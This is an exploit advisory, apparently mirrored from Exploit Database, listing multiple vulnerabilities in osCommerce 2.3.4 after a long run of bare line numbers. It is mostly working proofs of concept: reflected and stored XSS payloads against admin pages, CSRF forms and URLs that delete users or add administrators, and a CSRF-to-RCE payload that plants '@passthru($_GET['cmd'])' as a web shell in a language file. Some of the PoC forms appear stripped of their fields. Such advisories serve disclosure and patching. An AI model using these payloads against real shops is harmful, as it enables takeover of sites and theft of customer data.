osCommerce 2.3.4 – Multiple Vulnerabilities

Exploit Database
105 阅读

作者： smash

日期： 2014-09-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34582/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

461

462

463

464

465

466

467

468

469

470

471

472

473

474

475

476

477

478

479

480

481

482

483

484

485

486

487

488

489

490

491

492

493

494

495

496

497

498

499

500

501

502

503

504

505

506

507

508

509

510

511

512

513

514

515

516

517

518

519

520

521

522

523

524

525

526

527

528

529

530

531

532

533

534

535

536

537

538

539

540

541

542

543

544

545

546

547

548

549

550

551

552

553

554

555

556

557

558

559

560

561

562

563

564

565

566

567

568

569

570

571

572

573

574

575

576

577

578

579

580

581

582

583

584

585

586

587

588

589

590

591

592

593

594

595

596

597

598

599

600

601

602

603

604

605

606

607

608

609

610

611

612

613

614

615

616

617

618

619

620

621

622

623

624

625

626

627

628

629

630

631

632

633

634

635

636

637

638

639

640

641

642

643

644

645

646

647

648

649

650

651

652

653

654

655

656

657

658

659

660

661

662

663

664

665

#Title: osCommerce 2.3.4 - Multiple vulnerabilities

#Date: 10.07.14

#Affected versions: => 2.3.4 (latest atm)

#Vendor: oscommerce.com

#Tested on: Apache 2.2.22 [at] Debian

#Contact: smash [at] devilteam.pl

#Cross Site Scripting

1. Reflected XSS -> Send Email

Vulnerable parameters - customers_email_address & mail_sent_to

a) POST

Request:

POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1

Host: localhost

customers_email_address=<script>alert(666)</script>&from=fuck@shit.up&subject=test&message=test

Response:

HTTP/1.1 200 OK

(...)

<td class="smallText"><strong>Customer:</strong><br /><script>alert(666)</script></td>

</tr>

(...)

CSRF PoC:

<html>

<body>

<input type="hidden" name="customers_email_address" value="<script>alert(666)</script>" />

</form>

</body>

</html>

b) GET

Request:

GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1

Host: localhost

Response:

(...)

<td class="messageStackSuccess"><img src="https://www.exploit-db.com/exploits/34582/images/icons/success.gif" border="0" alt="Success" title="Success" />&nbps;Notice: Email sent to: <script>alert(666)</script></td>

</tr>

(...)

2. Persistent XSS via CSRF -> Newsletter

Request:

POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1

Host: localhost

module=newsletter&title=<script>alert(123)</script>&content=<script>alert(456)</script>

CSRF PoC:

<html>

<body>

<input type="hidden" name="title" value="<script>alert(123)</script>" />

<input type="hidden" name="content" value="<script>alert(456)</script>" />

</form>

</body>

</html>

First popbox (123) will be executed whenever someone will visit newsletters page:

localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php

(...)

<td class="dataTableContent"><a href="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="https://www.exploit-db.com/exploits/34582/images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbps;<script>alert(123)</script></td>

(...)

<td class="infoBoxHeading"><strong><script>alert(123)</script></strong></td>

</tr>

(...)

Second one, will be executed whenever someone will visit specific newsletter page:

localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview

(...)

<tr>

<td><tt><script>alert(456)</script></tt></td>

</tr>

<tr>

(...)

3. Persistent XSS via CSRF -> Banner manager

Vulnerable parameter - banners_title

PoC:

<html>

<body>

function go()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?action=insert", true);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19390593192018454503847724432");

xhr.withCredentials = true;

var body = "-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_title\"\r\n" +

"\r\n" +

"\x3cscript\x3ealert(666)\x3c/script\x3e\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_url\"\r\n" +

"\r\n" +

"url\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_group\"\r\n" +

"\r\n" +

"footer\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"new_banners_group\"\r\n" +

"\r\n" +

"group\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_image\"; filename=\"info.gif\"\r\n" +

"Content-Type: application/x-php\r\n" +

"\r\n" +

"\x3c?php\n" +

"phpinfo();\n" +

"?\x3e\n" +

"\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_image_local\"\r\n" +

"\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_image_target\"\r\n" +

"\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"banners_html_text\"\r\n" +

"\r\n" +

"sup\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"date_scheduled\"\r\n" +

"\r\n" +

"2014-07-01\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"expires_date\"\r\n" +

"\r\n" +

"2014-07-31\r\n" +

"-----------------------------19390593192018454503847724432\r\n" +

"Content-Disposition: form-data; name=\"expires_impressions\"\r\n" +

"\r\n" +

"-----------------------------19390593192018454503847724432--\r\n";

var aBody = new Uint8Array(body.length);

for (var i = 0; i < aBody.length; i++)

aBody[i] = body.charCodeAt(i);

xhr.send(new Blob([aBody]));

}

</script>

</form>

</body>

</html>

JS will be executed whenever someone will visitd banner manager page or specific banner page.

localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php

localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]

Response:

<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=3')"><img src="https://www.exploit-db.com/exploits/34582/images/icon_popup.gif" border="0" alt="View Banner" title="View Banner" /></a>&nbps;<script>alert(666)</script></td>

<td class="dataTableContent" align="right">group</td>

4. Persistent XSS via CSRF -> Locations / Taxes

Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.

PoC:

<html>

<body>

<input type="hidden" name="countries_name" value="AAAA<script>alert(666)</script>" />

</form>

</body>

</html>

JS will be executed whenever someone will visitd 'countries' tab:

localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php

Response:

(...)

<td class="dataTableContent">AAAA<script>alert(666)</script></td>

(...)

5. Persistent XSS via CSRF -> Localization

a) Currencies

PoC:

<html>

<body>

<input type="hidden" name="title" value="<script>alert(666)</script>" />

<input type="hidden" name="value" value="666"><script>alert(123)</script>" />

</form>

</body>

</html>

JS will be executed whenever someone will visit currencies tab:

localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php

Response:

(...)

<td class="dataTableContent"><strong><script>alert(666)</script> (default)</strong></td>

(...)

b) Languages

PoC:

<html>

<body>

<input type="hidden" name="name" value=""><script>alert(666)</script>" />

</form>

</body>

</html>

JS will be executed whenever someone will visit langauges tab:

localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php

Response:

(...)

<td class="dataTableContent"><script>alert(666)</script></td>

(...)

c) Orders status

Request:

POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1

Host: localhost

orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS

Response:

(...)

(...)

(...)

<td class="infoBoxContent"><br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt="<script>alert(666)</script>" title="<script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf'>"><>XSS/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english/images/icon.gif" border="0" alt="English" title="English" />&nbps;'>"><>XSS</td>

</tr>

#Boring CSRF

- Remove any item from cart

localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product

- Add item to cart

localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product

- Remove address book entry

localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1

- Remove specific country

localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm

- Remove specific currency

localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm

- Change store credentials

I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF.

localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php

...and a lot more.

#Less boring CSRF

- Send email as admin -> Send email

It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.

<html>

<body>

</form>

</body>

</html>

- Delete / Edit specific user

Remove user PoC:

localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm

Edit user PoC:

<html>

<body>

</form>

</body>

</html>

- Add / Edit / Delete admin

Add admin account:

<html>

<body>

</form>

</body>

</html>

Change admin (set new password):

<html>

<body>

</form>

</body>

</html>

Remove admin:

localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm

- RCE via CSRF -> Define Languages

It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included.

localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a

PoC:

<html>

<body>

<input type="hidden" name="file_contents" value="<?php

$Id$

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

Released under the GNU General Public License

// look in your $PATH_LOCALE/locale directory for available locales

// or type locale -a on the server.

// Examples:

// on RedHat try 'en_US'

// on FreeBSD try 'en_US.ISO_8859-1'

// on Windows try 'en', or 'English'

@setlocale(LC_ALL, array('en_US.UTF-8', 'en_US.UTF8', 'enu_usa'));

define('DATE_FORMAT_SHORT', '%m/%d/%Y');// this is used for strftime()

define('DATE_FORMAT_LONG', '%A %d %B, %Y'); // this is used for strftime()

define('DATE_FORMAT', 'm/d/Y'); // this is used for date()

define('DATE_TIME_FORMAT', DATE_FORMAT_SHORT . ' %H:%M:%S');

define('JQUERY_DATEPICKER_I18N_CODE', ''); // leave empty for en_US; see http://jqueryui.com/demos/datepicker/#localization

define('JQUERY_DATEPICKER_FORMAT', 'mm/dd/yy'); // see http://docs.jquery.com/UI/Datepicker/formatDate

@passthru($_GET['cmd']);

////

// Return date in raw format

// $date should be in format mm/dd/yyyy

// raw date is in format YYYYMMDD, or DDMMYYYY

function tep_date_raw($date, $reverse = false) {

if ($reverse) {

return substr($date, 3, 2) . substr($date, 0, 2) . substr($date, 6, 4);

} else {

return substr($date, 6, 4) . substr($date, 0, 2) . substr($date, 3, 2);

}

// if USE_DEFAULT_LANGUAGE_CURRENCY is true, use the following currency, instead of the applications default currency (used when changing language)

define('LANGUAGE_CURRENCY', 'USD');

// Global entries for the <html> tag

define('HTML_PARAMS', 'dir="ltr" lang="en"');

// charset for web pages and emails

define('CHARSET', 'utf-8');

// page title

define('TITLE', STORE_NAME);

// header text in includes/header.php

define('HEADER_TITLE_CREATE_ACCOUNT', 'Create an Account');

define('HEADER_TITLE_MY_ACCOUNT', 'My Account');

define('HEADER_TITLE_CART_CONTENTS', 'Cart Contents');

define('HEADER_TITLE_CHECKOUT', 'Checkout');

define('HEADER_TITLE_TOP', 'Top');

define('HEADER_TITLE_CATALOG', 'Catalog');

define('HEADER_TITLE_LOGOFF', 'Log Off');

define('HEADER_TITLE_LOGIN', 'Log In');

// footer text in includes/footer.php

define('FOOTER_TEXT_REQUESTS_SINCE', 'requests since');

// text for gender

define('MALE', 'Male');

define('FEMALE', 'Female');

define('MALE_ADDRESS', 'Mr.');

define('FEMALE_ADDRESS', 'Ms.');

// text for date of birth example

define('DOB_FORMAT_STRING', 'mm/dd/yyyy');

// checkout procedure text

define('CHECKOUT_BAR_DELIVERY', 'Delivery Information');

define('CHECKOUT_BAR_PAYMENT', 'Payment Information');

define('CHECKOUT_BAR_CONFIRMATION', 'Confirmation');

define('CHECKOUT_BAR_FINISHED', 'Finished!');

// pull down default text

define('PULL_DOWN_DEFAULT', 'Please Select');

define('TYPE_BELOW', 'Type Below');

// javascript messages

define('JS_ERROR', 'Errors have occured during the process of your form.\n\nPlease make the following corrections:\n\n');

define('JS_REVIEW_TEXT', '* The \'Review Text\' must have at least ' . REVIEW_TEXT_MIN_LENGTH . ' characters.\n');

define('JS_REVIEW_RATING', '* You must rate the product for your review.\n');

define('JS_ERROR_NO_PAYMENT_MODULE_SELECTED', '* Please select a payment method for your order.\n');

define('JS_ERROR_SUBMITTED', 'This form has already been submitted. Please press Ok and wait for this process to be completed.');

define('ERROR_NO_PAYMENT_MODULE_SELECTED', 'Please select a payment method for your order.');

define('CATEGORY_COMPANY', 'Company Details');

define('CATEGORY_PERSONAL', 'Your Personal Details');

define('CATEGORY_ADDRESS', 'Your Address');

define('CATEGORY_CONTACT', 'Your Contact Information');

define('CATEGORY_OPTIONS', 'Options');

define('CATEGORY_PASSWORD', 'Your Password');

define('ENTRY_COMPANY', 'Company Name:');

define('ENTRY_COMPANY_TEXT', '');

define('ENTRY_GENDER', 'Gender:');

define('ENTRY_GENDER_ERROR', 'Please select your Gender.');

define('ENTRY_GENDER_TEXT', '*');

define('ENTRY_FIRST_NAME', 'First Name:');

define('ENTRY_FIRST_NAME_ERROR', 'Your First Name must contain a minimum of ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' characters.');

define('ENTRY_FIRST_NAME_TEXT', '*');

define('ENTRY_LAST_NAME', 'Last Name:');

define('ENTRY_LAST_NAME_ERROR', 'Your Last Name must contain a minimum of ' . ENTRY_LAST_NAME_MIN_LENGTH . ' characters.');

define('ENTRY_LAST_NAME_TEXT', '*');

define('ENTRY_DATE_OF_BIRTH', 'Date of Birth:');

define('ENTRY_DATE_OF_BIRTH_ERROR', 'Your Date of Birth must be in this format: MM/DD/YYYY (eg 05/21/1970)');

define('ENTRY_DATE_OF_BIRTH_TEXT', '* (eg. 05/21/1970)');

define('ENTRY_EMAIL_ADDRESS', 'E-Mail Address:');

define('ENTRY_EMAIL_ADDRESS_ERROR', 'Your E-Mail Address must contain a minimum of ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' characters.');

define('ENTRY_EMAIL_ADDRESS_CHECK_ERROR', 'Your E-Mail Address does not appear to be valid - please make any necessary corrections.');

define('ENTRY_EMAIL_ADDRESS_ERROR_EXISTS', 'Your E-Mail Address already exists in our records - please log in with the e-mail address or create an account with a different address.');

define('ENTRY_EMAIL_ADDRESS_TEXT', '*');

define('ENTRY_STREET_ADDRESS', 'Street Address:');

define('ENTRY_STREET_ADDRESS_ERROR', 'Your Street Address must contain a minimum of ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' characters.');

define('ENTRY_STREET_ADDRESS_TEXT', '*');

define('ENTRY_SUBURB', 'Suburb:');

define('ENTRY_SUBURB_TEXT', '');

define('ENTRY_POST_CODE', 'Post Code:');

define('ENTRY_POST_CODE_ERROR', 'Your Post Code must contain a minimum of ' . ENTRY_POSTCODE_MIN_LENGTH . ' characters.');

define('ENTRY_POST_CODE_TEXT', '*');

define('ENTRY_CITY', 'City:');

define('ENTRY_CITY_ERROR', 'Your City must contain a minimum of ' . ENTRY_CITY_MIN_LENGTH . ' characters.');

define('ENTRY_CITY_TEXT', '*');

define('ENTRY_STATE', 'State/Province:');

define('ENTRY_STATE_ERROR', 'Your State must contain a minimum of ' . ENTRY_STATE_MIN_LENGTH . ' characters.');

define('ENTRY_STATE_ERROR_SELECT', 'Please select a state from the States pull down menu.');

define('ENTRY_STATE_TEXT', '*');

define('ENTRY_COUNTRY', 'Country:');

define('ENTRY_COUNTRY_ERROR', 'You must select a country from the Countries pull down menu.');

define('ENTRY_COUNTRY_TEXT', '*');

define('ENTRY_TELEPHONE_NUMBER', 'Telephone Number:');

define('ENTRY_TELEPHONE_NUMBER_ERROR', 'Your Telephone Number must contain a minimum of ' . ENTRY_TELEPHONE_MIN_LENGTH . ' characters.');

define('ENTRY_TELEPHONE_NUMBER_TEXT', '*');

define('ENTRY_FAX_NUMBER', 'Fax Number:');

define('ENTRY_FAX_NUMBER_TEXT', '');

define('ENTRY_NEWSLETTER', 'Newsletter:');

define('ENTRY_NEWSLETTER_TEXT', '');

define('ENTRY_NEWSLETTER_YES', 'Subscribed');

define('ENTRY_NEWSLETTER_NO', 'Unsubscribed');

define('ENTRY_PASSWORD', 'Password:');

define('ENTRY_PASSWORD_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');

define('ENTRY_PASSWORD_ERROR_NOT_MATCHING', 'The Password Confirmation must match your Password.');

define('ENTRY_PASSWORD_TEXT', '*');

define('ENTRY_PASSWORD_CONFIRMATION', 'Password Confirmation:');

define('ENTRY_PASSWORD_CONFIRMATION_TEXT', '*');

define('ENTRY_PASSWORD_CURRENT', 'Current Password:');

define('ENTRY_PASSWORD_CURRENT_TEXT', '*');

define('ENTRY_PASSWORD_CURRENT_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');

define('ENTRY_PASSWORD_NEW', 'New Password:');

define('ENTRY_PASSWORD_NEW_TEXT', '*');

define('ENTRY_PASSWORD_NEW_ERROR', 'Your new Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');

define('ENTRY_PASSWORD_NEW_ERROR_NOT_MATCHING', 'The Password Confirmation must match your new Password.');

define('PASSWORD_HIDDEN', '--HIDDEN--');

define('FORM_REQUIRED_INFORMATION', '* Required information');

// constants for use in tep_prev_next_display function

define('TEXT_RESULT_PAGE', 'Result Pages:');

define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> products)');

define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> orders)');

define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> reviews)');

define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> new products)');

define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> specials)');

define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page');

define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page');

define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page');

define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page');

define('PREVNEXT_TITLE_PAGE_NO', 'Page %d');

define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages');

define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages');

define('PREVNEXT_BUTTON_FIRST', '<<FIRST');

define('PREVNEXT_BUTTON_PREV', '[<< Prev]');

define('PREVNEXT_BUTTON_NEXT', '[Next >>]');

define('PREVNEXT_BUTTON_LAST', 'LAST>>');

define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address');

define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book');

define('IMAGE_BUTTON_BACK', 'Back');

define('IMAGE_BUTTON_BUY_NOW', 'Buy Now');

define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address');

define('IMAGE_BUTTON_CHECKOUT', 'Checkout');

define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order');

define('IMAGE_BUTTON_CONTINUE', 'Continue');

define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping');

define('IMAGE_BUTTON_DELETE', 'Delete');

define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account');

define('IMAGE_BUTTON_HISTORY', 'Order History');

define('IMAGE_BUTTON_LOGIN', 'Sign In');

define('IMAGE_BUTTON_IN_CART', 'Add to Cart');

define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications');

define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find');

define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications');

define('IMAGE_BUTTON_REVIEWS', 'Reviews');

define('IMAGE_BUTTON_SEARCH', 'Search');

define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options');

define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend');

define('IMAGE_BUTTON_UPDATE', 'Update');

define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart');

define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review');

define('SMALL_IMAGE_BUTTON_DELETE', 'Delete');

define('SMALL_IMAGE_BUTTON_EDIT', 'Edit');

define('SMALL_IMAGE_BUTTON_VIEW', 'View');

define('ICON_ARROW_RIGHT', 'more');

define('ICON_CART', 'In Cart');

define('ICON_ERROR', 'Error');

define('ICON_SUCCESS', 'Success');

define('ICON_WARNING', 'Warning');

define('TEXT_GREETING_PERSONAL', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="https://www.exploit-db.com/exploits/34582/%s"><u>new products</u></a> are available to purchase?');

define('TEXT_GREETING_PERSONAL_RELOGON', '<small>If you are not %s, please <a href="https://www.exploit-db.com/exploits/34582/%s"><u>log yourself in</u></a> with your account information.</small>');

define('TEXT_GREETING_GUEST', 'Welcome <span class="greetUser">Guest!</span> Would you like to <a href="https://www.exploit-db.com/exploits/34582/%s"><u>log yourself in</u></a>? Or would you prefer to <a href="https://www.exploit-db.com/exploits/34582/%s"><u>create an account</u></a>?');

define('TEXT_SORT_PRODUCTS', 'Sort products ');

define('TEXT_DESCENDINGLY', 'descendingly');

define('TEXT_ASCENDINGLY', 'ascendingly');

define('TEXT_BY', ' by ');

define('TEXT_REVIEW_BY', 'by %s');

define('TEXT_REVIEW_WORD_COUNT', '%s words');

define('TEXT_REVIEW_RATING', 'Rating: %s [%s]');

define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s');

define('TEXT_NO_REVIEWS', 'There are currently no product reviews.');

define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.');

define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate');

define('TEXT_REQUIRED', '<span class="errorText">Required</span>');

define('ERROR_TEP_MAIL', '<font face="Verdana, Arial" size="2" color="#ff0000"><strong><small>TEP ERROR:</small> Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.</strong></font>');

define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.');

define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.');

define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.');

define('FOOTER_TEXT_BODY', 'Copyright © ' . date('Y') . ' <a href="https://www.exploit-db.com/exploits/34582/' . tep_href_link(FILENAME_DEFAULT) . '">' . STORE_NAME . '</a><br />Powered by <a href="http://www.oscommerce.com" target="_blank">osCommerce</a>');

" />

</form>

</body>

</html>